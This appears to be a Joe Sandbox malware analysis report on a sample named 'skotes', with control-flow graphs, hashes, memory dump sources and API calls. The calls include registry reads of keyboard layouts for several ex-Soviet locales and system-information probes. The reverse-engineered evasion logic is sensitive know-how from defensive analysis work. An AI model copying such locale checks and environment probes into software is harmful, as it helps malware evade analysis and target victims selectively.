                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                        • String ID: "$246122658369$5120$Fw==$Hykl$V2Te$WGpm$WTw=$WX f$invalid stoi argument$stoi argument out of range
                                                                                                                                        • API String ID: 4078500453-1402436090
                                                                                                                                        • Opcode ID: c5e8194c0c8ae5ec6388a1ef611355a1d990d3cac14653b24e4256271a99331e
                                                                                                                                        • Instruction ID: ec10980a9266085de3af0c8068e0fdce1e6a790eab5dcc268482fff131ddbe6a
                                                                                                                                        • Opcode Fuzzy Hash: c5e8194c0c8ae5ec6388a1ef611355a1d990d3cac14653b24e4256271a99331e
                                                                                                                                        • Instruction Fuzzy Hash: 7C72D271A00248DBDF18EF68CD8A7DDBBB5EB45300F54458CE446A7382DB359B848BB2

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1714 da5ee0-da5fde RegOpenKeyExA 1719 da6008-da6015 call dbcff1 1714->1719 1720 da5fe0-da5fec 1714->1720 1722 da5ffe-da6005 call dbd663 1720->1722 1723 da5fee-da5ffc 1720->1723 1722->1719 1723->1722 1725 da6016-da619d call dd6c6a call dbe150 call db80c0 * 5 RegOpenKeyExA 1723->1725 1742 da61a3-da6233 call dd40f0 1725->1742 1743 da64b1-da64ba 1725->1743 1769 da6239-da623d 1742->1769 1770 da649f-da64ab 1742->1770 1745 da64bc-da64c7 1743->1745 1746 da64e7-da64f0 1743->1746 1750 da64c9-da64d7 1745->1750 1751 da64dd-da64e4 call dbd663 1745->1751 1747 da651d-da6526 1746->1747 1748 da64f2-da64fd 1746->1748 1754 da6528-da6533 1747->1754 1755 da6553-da655c 1747->1755 1752 da64ff-da650d 1748->1752 1753 da6513-da651a call dbd663 1748->1753 1750->1751 1756 da65d7-da65df call dd6c6a 1750->1756 1751->1746 1752->1753 1752->1756 1753->1747 1760 da6549-da6550 call dbd663 1754->1760 1761 da6535-da6543 1754->1761 1763 da655e-da6569 1755->1763 1764 da6585-da658e 1755->1764 1760->1755 1761->1756 1761->1760 1773 da657b-da6582 call dbd663 1763->1773 1774 da656b-da6579 1763->1774 1766 da65bb-da65d6 call dbcff1 1764->1766 1767 da6590-da659f 1764->1767 1776 da65b1-da65b8 call dbd663 1767->1776 1777 da65a1-da65af 1767->1777 1779 da6499 1769->1779 1780 da6243-da6279 RegEnumValueA 1769->1780 1770->1743 1773->1764 1774->1756 1774->1773 1776->1766 1777->1756 1777->1776 1779->1770 1786 da627f-da629e 1780->1786 1787 da6486-da648d 1780->1787 1790 da62a0-da62a5 1786->1790 1787->1780 1788 da6493 1787->1788 1788->1779 1790->1790 1791 da62a7-da62fb call db80c0 call db7a00 * 2 call da5d50 1790->1791 1791->1787
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,?), ref: 00DA5F13
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open
                                                                                                                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                        • API String ID: 71445658-3963862150
                                                                                                                                        • Opcode ID: b5bb52102bbe99e8a5d59496547c8c643656f9835a362280d1aa1e23eba1136e
                                                                                                                                        • Instruction ID: 73fe2aa6ae40b97771b522056181c0fea967ea88b52afedb19636252e8e4439c
                                                                                                                                        • Opcode Fuzzy Hash: b5bb52102bbe99e8a5d59496547c8c643656f9835a362280d1aa1e23eba1136e
                                                                                                                                        • Instruction Fuzzy Hash: 41D1BD71900258DBEB24DF24CC84BDEB7B9EF05340F5442D8E509E7291DB74AAA8CFA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1799 da7d30-da7db2 call dd40f0 1803 da7db8-da7de0 call db7a00 call da5c10 1799->1803 1804 da8356-da8373 call dbcff1 1799->1804 1811 da7de2 1803->1811 1812 da7de4-da7e06 call db7a00 call da5c10 1803->1812 1811->1812 1817 da7e0a-da7e23 1812->1817 1818 da7e08 1812->1818 1821 da7e54-da7e7f 1817->1821 1822 da7e25-da7e34 1817->1822 1818->1817 1825 da7eb0-da7ed1 1821->1825 1826 da7e81-da7e90 1821->1826 1823 da7e4a-da7e51 call dbd663 1822->1823 1824 da7e36-da7e44 1822->1824 1823->1821 1824->1823 1829 da8374 call dd6c6a 1824->1829 1827 da7ed3-da7ed5 GetNativeSystemInfo 1825->1827 1828 da7ed7-da7edc 1825->1828 1831 da7e92-da7ea0 1826->1831 1832 da7ea6-da7ead call dbd663 1826->1832 1834 da7edd-da7ee6 1827->1834 1828->1834 1841 da8379-da837f call dd6c6a 1829->1841 1831->1829 1831->1832 1832->1825 1839 da7ee8-da7eef 1834->1839 1840 da7f04-da7f07 1834->1840 1842 da8351 1839->1842 1843 da7ef5-da7eff 1839->1843 1844 da7f0d-da7f16 1840->1844 1845 da82f7-da82fa 1840->1845 1842->1804 1847 da834c 1843->1847 1848 da7f18-da7f24 1844->1848 1849 da7f29-da7f2c 1844->1849 1845->1842 1850 da82fc-da8305 1845->1850 1847->1842 1848->1847 1852 da7f32-da7f39 1849->1852 1853 da82d4-da82d6 1849->1853 1854 da832c-da832f 1850->1854 1855 da8307-da830b 1850->1855 1856 da8019-da82bd call db7a00 call da5c10 call db7a00 call da5c10 call da5d50 call db7a00 call da5c10 call da5730 call db7a00 call da5c10 call db7a00 call da5c10 call da5d50 call db7a00 call da5c10 call da5730 call db7a00 call da5c10 call db7a00 call da5c10 call da5d50 call db7a00 call da5c10 call da5730 call db7a00 call da5c10 call db7a00 call da5c10 call da5d50 call db7a00 call da5c10 call da5730 1852->1856 1857 da7f3f-da7f9b call db7a00 call da5c10 call db7a00 call da5c10 call da5d50 1852->1857 1862 da82d8-da82e2 1853->1862 1863 da82e4-da82e7 1853->1863 1860 da833d-da8349 1854->1860 1861 da8331-da833b 1854->1861 1858 da830d-da8312 1855->1858 1859 da8320-da832a 1855->1859 1900 da82c3-da82cc 1856->1900 1885 da7fa0-da7fa7 1857->1885 1858->1859 1865 da8314-da831e 1858->1865 1859->1842 1860->1847 1861->1842 1862->1847 1863->1842 1867 da82e9-da82f5 1863->1867 1865->1842 1867->1847 1887 da7fab-da7fcb call dd8bbe 1885->1887 1888 da7fa9 1885->1888 1894 da7fcd-da7fdc 1887->1894 1895 da8002-da8004 1887->1895 1888->1887 1896 da7fde-da7fec 1894->1896 1897 da7ff2-da7fff call dbd663 1894->1897 1899 da800a-da8014 1895->1899 1895->1900 1896->1841 1896->1897 1897->1895 1899->1900 1900->1845 1903 da82ce 1900->1903 1903->1853
                                                                                                                                        APIs
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00DA7ED3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                        • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                        • API String ID: 1721193555-3123340372
                                                                                                                                        • Opcode ID: f0865576d67ef66152aad3e34bf259e3e6009097d1ab944d5a392313b59680e5
                                                                                                                                        • Instruction ID: 8bccf0bf29ae0d876f27b166758eca3cf9b10f167677449fae3fedd09cec1ede
                                                                                                                                        • Opcode Fuzzy Hash: f0865576d67ef66152aad3e34bf259e3e6009097d1ab944d5a392313b59680e5
                                                                                                                                        • Instruction Fuzzy Hash: CCE1E570E006449BDB14BB28DC5B3AD7BA1EB86720F94428CE816773C6DB354E8587F2

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2130 da8380-da8401 call dd40f0 2134 da840d-da8435 call db7a00 call da5c10 2130->2134 2135 da8403-da8408 2130->2135 2143 da8439-da845b call db7a00 call da5c10 2134->2143 2144 da8437 2134->2144 2136 da854f-da856b call dbcff1 2135->2136 2149 da845f-da8478 2143->2149 2150 da845d 2143->2150 2144->2143 2153 da847a-da8489 2149->2153 2154 da84a9-da84d4 2149->2154 2150->2149 2157 da848b-da8499 2153->2157 2158 da849f-da84a6 call dbd663 2153->2158 2155 da8501-da8522 2154->2155 2156 da84d6-da84e5 2154->2156 2161 da8528-da852d 2155->2161 2162 da8524-da8526 GetNativeSystemInfo 2155->2162 2159 da84f7-da84fe call dbd663 2156->2159 2160 da84e7-da84f5 2156->2160 2157->2158 2163 da856c-da8571 call dd6c6a 2157->2163 2158->2154 2159->2155 2160->2159 2160->2163 2167 da852e-da8535 2161->2167 2162->2167 2167->2136 2172 da8537-da853f 2167->2172 2173 da8548-da854b 2172->2173 2174 da8541-da8546 2172->2174 2173->2136 2175 da854d 2173->2175 2174->2136 2175->2136
                                                                                                                                        APIs
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00DA8524
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                        • Opcode ID: 6a60c8c8188deb582c6e38c5e3ffe3888dfae3a46694ea3a0bafc2d57202c837
                                                                                                                                        • Instruction ID: ed57ff755fb451dfc265dac24aec8ede584e7a905b1dbdcc7d4c8170b870d217
                                                                                                                                        • Opcode Fuzzy Hash: 6a60c8c8188deb582c6e38c5e3ffe3888dfae3a46694ea3a0bafc2d57202c837
                                                                                                                                        • Instruction Fuzzy Hash: 2C512770D102589BDB24EB68CD457EDB7B6EB46314F5042A8EC09A72C1EF749E848BB1

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2267 ddb04b-ddb057 2268 ddb089-ddb094 call dd75f6 2267->2268 2269 ddb059-ddb05b 2267->2269 2277 ddb096-ddb098 2268->2277 2270 ddb05d-ddb05e 2269->2270 2271 ddb074-ddb085 RtlAllocateHeap 2269->2271 2270->2271 2273 ddb087 2271->2273 2274 ddb060-ddb067 call dd9dc0 2271->2274 2273->2277 2274->2268 2279 ddb069-ddb072 call dd8e36 2274->2279 2279->2268 2279->2271
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,1764DD82,?,?,00DBD3FC,1764DD82,?,00DB7A8B,?,?,?,?,?,?,00DA7465,?), ref: 00DDB07E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 904928ca4a41931b69bec28038740e0df07eab55cc7c1bc59b9df4474d028b1e
                                                                                                                                        • Instruction ID: dbf6dc4630ec8e30aa2a381f73dbd2fd308e0287fb85fc77f26702e9fa011463
                                                                                                                                        • Opcode Fuzzy Hash: 904928ca4a41931b69bec28038740e0df07eab55cc7c1bc59b9df4474d028b1e
                                                                                                                                        • Instruction Fuzzy Hash: 2BE06D39141626DAEA3132659C41B7FAA48DB437B5F1B1213ED64A6390EB21DC0082F1

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 6a3e5c4b19d037f2cf12d72a85c0b887986c6e0e3031b2fdb08343540fe01b58
                                                                                                                                        • Instruction ID: 69faa3ce1d8120454635db3e31926972ccb6609bf9b4512388c4e85f25607dcc
                                                                                                                                        • Opcode Fuzzy Hash: 6a3e5c4b19d037f2cf12d72a85c0b887986c6e0e3031b2fdb08343540fe01b58
                                                                                                                                        • Instruction Fuzzy Hash: 84F0D171A00600EBC700BB699C06B5E7BB4EB47760F80034CE822772D6EA345A0487F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0d54ced9d7c803c37c71b3c869a080f2fab646a54c8e0ba2ccb0531f00c50bb2
                                                                                                                                        • Instruction ID: e327e297a0a512270c2070df9c268b7e63152d994d13442cfc8e3112f40e3a2e
                                                                                                                                        • Opcode Fuzzy Hash: 0d54ced9d7c803c37c71b3c869a080f2fab646a54c8e0ba2ccb0531f00c50bb2
                                                                                                                                        • Instruction Fuzzy Hash: F2115EF720C2107FE20246415B745FA7B7EEBC333133194A7F847C5122E2A51A4A7572
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8a3f5b292ced7fe5a4457cfe2ed3206763f14b9f256f4feff84cfa3fe927873b
                                                                                                                                        • Instruction ID: 2142330f63eda7bf426691fda4fb514e9c82c63f07ff080727e188f3e6858938
                                                                                                                                        • Opcode Fuzzy Hash: 8a3f5b292ced7fe5a4457cfe2ed3206763f14b9f256f4feff84cfa3fe927873b
                                                                                                                                        • Instruction Fuzzy Hash: 0811E3EB24C110BEE14645826B64AFA2B7EEBC3330731D8AAF847C1212F2951A497172
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b4fe5a9c4b06543da69793ea9fb4a5254ae4b441723aed25a9e3307fde8f157e
                                                                                                                                        • Instruction ID: cf94c923fe55b6efccdd1561a5e6caf70461b1085ef9451a3b6402e18c25f24c
                                                                                                                                        • Opcode Fuzzy Hash: b4fe5a9c4b06543da69793ea9fb4a5254ae4b441723aed25a9e3307fde8f157e
                                                                                                                                        • Instruction Fuzzy Hash: 1D112EFB24D110BEE10285815B609F67B7DEBC3330731D4A6F843C2112F3A51A497572
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5a2d130fb9723e4e55fcb6632cdf6da72f9ea686e89a0d257e5c37d828052fe9
                                                                                                                                        • Instruction ID: 702e22bcc77af37ba14f2812c7e5b3274664262c01ccebd307bf944b960e83ea
                                                                                                                                        • Opcode Fuzzy Hash: 5a2d130fb9723e4e55fcb6632cdf6da72f9ea686e89a0d257e5c37d828052fe9
                                                                                                                                        • Instruction Fuzzy Hash: 4011E7EB24D110BEE14655815B64AFA3B7EEBC3330731D4A6F847C1222F2951A497172
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2794f077828db99b0740955394589fb04fa42f4d5a4447a7f001096fbcdc6247
                                                                                                                                        • Instruction ID: 97334bf243d6ccb464492ca006fa2798e7b5b68b35e670d6510b5709debb8db7
                                                                                                                                        • Opcode Fuzzy Hash: 2794f077828db99b0740955394589fb04fa42f4d5a4447a7f001096fbcdc6247
                                                                                                                                        • Instruction Fuzzy Hash: 1B01F5AB24D1206EE64245816B20AF62B7DEBC3331730A8A3F843C4122E394164E75B2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5fa443088144f4ba700c17d3e3e25254bc4dcbbb1cc60114d714b1d8355e281a
                                                                                                                                        • Instruction ID: 21bcbe4f9949c09753f947984649e67d90f42129a09077b28bafc79963c2a4a1
                                                                                                                                        • Opcode Fuzzy Hash: 5fa443088144f4ba700c17d3e3e25254bc4dcbbb1cc60114d714b1d8355e281a
                                                                                                                                        • Instruction Fuzzy Hash: 2DF0B4B724C120BEE14245816B20AFA6B7DE7C3331731D8A3F843C4112F3A51A497272
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2962793072.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_skotes.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fbcd8c661d806ab1dbbd03e63d6bd40c3b9ba9364f528b20095ed3ebfa1a67f2
                                                                                                                                        • Instruction ID: 8cc0dfa31454aca800ac282a3fc76449cfea47a986c93f114cc919a742786106
                                                                                                                                        • Opcode Fuzzy Hash: fbcd8c661d806ab1dbbd03e63d6bd40c3b9ba9364f528b20095ed3ebfa1a67f2
                                                                                                                                        • Instruction Fuzzy Hash: FDF046B320D220EFE202941167A5AFA6BBED7C3330731946AF842C6511E38512497672
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                        • Opcode ID: 8b8c08f207380376272a3c3081265e42339378886e17da3037a34d8edfa76596
